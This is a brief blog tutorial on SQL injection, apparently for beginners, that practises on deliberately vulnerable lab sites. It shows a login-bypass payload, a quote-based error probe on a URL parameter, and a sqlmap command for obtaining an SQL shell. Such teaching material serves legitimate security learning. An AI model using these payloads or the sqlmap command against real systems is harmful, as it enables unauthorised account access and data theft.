Open in app

Sign in

Write

Sign in

Identifying Sql injection (sqli) on codingame.com and http://testphp.vulnweb.com/

UJJWAL GAUTAM
3 min readJul 7, 2021

--

What is sql injection?

SQL injection is a web security vulnerability that allows an attacker to interfere with the queries that an application makes to its database. It generally allows an attacker to view data that they are not normally able to retrieve. This might include data belonging to other users, or any other data that the application itself is able to access. In many cases, an attacker can modify or delete this data, causing persistent changes to the application’s content or behavior. (source- portswigger website- https://portswigger.net/web-security/sql-injection)

Lets practice on the lab. https://www.codingame.com/playgrounds/154/sql-injection-demo/sql-injection. I had learnt about these vulnerabilities and labs from Rohit Gautam and Shifa Cyclewala.

Go check their youtube channel for now.

Hacktify Cyber Security

Premier Leader of professional Training in Cyber Security and Ethical Hacking | Making the Internet safer

www.youtube.com

Now Lets begin.

So the username is admin and password is admin123. The account should have been accessed by entering username and password only but due to the sqli it becomes possible to get access to the account without knowing the real password. What we enter in the password filed is unknown’ or ‘1’=’1

Lets enter that and lets see what happens.

We used : Username= admin

and password = unknown’ or ‘1’=’1

Lets see what happens.

Boom! We got access to the administrator account without knowing the password or by entering the wrong password.

Lets understand the logic behind the application gave access.

username= admin and password=unknown’ or ‘1’=’1

true and false or true

false or true

true

Where can the query be injected?

  • In Get request
  • In Post Request
  • In Headers
  • In cookies

How to approach the target?

  • Fuzz the application parameters
  • Identify Injection Parameters
  • Check for vulnerable component
  • Attack with Sqli

SQL Injection at http://testphp.vulnweb.com/

Here the injection point is determined to be the URL parameter.

testphp.vulnweb.com/listproducts.php?cat=2

Lets see what happens when we input 2' as the value for cat parameter.

It is throwing SQL error which means this is vulnerable for sql injection.

Bonus Section

===

To get the sql shell, command in SQL map

python sqlmap.py -u “http://example.com/?id=1” -p id — — sql-shell

Enjoy!

Contact

If you want to connect on Facebook→ UJJWAL GAUTAM :)

Unlisted

--

--

UJJWAL GAUTAM
UJJWAL GAUTAM

Written by UJJWAL GAUTAM

43 Followers
82 Following

Programmer, Cybersecurity Enthusiast

No responses yet

Help

Status

About

Careers

Press

Blog

Privacy

Terms

Text to speech

Teams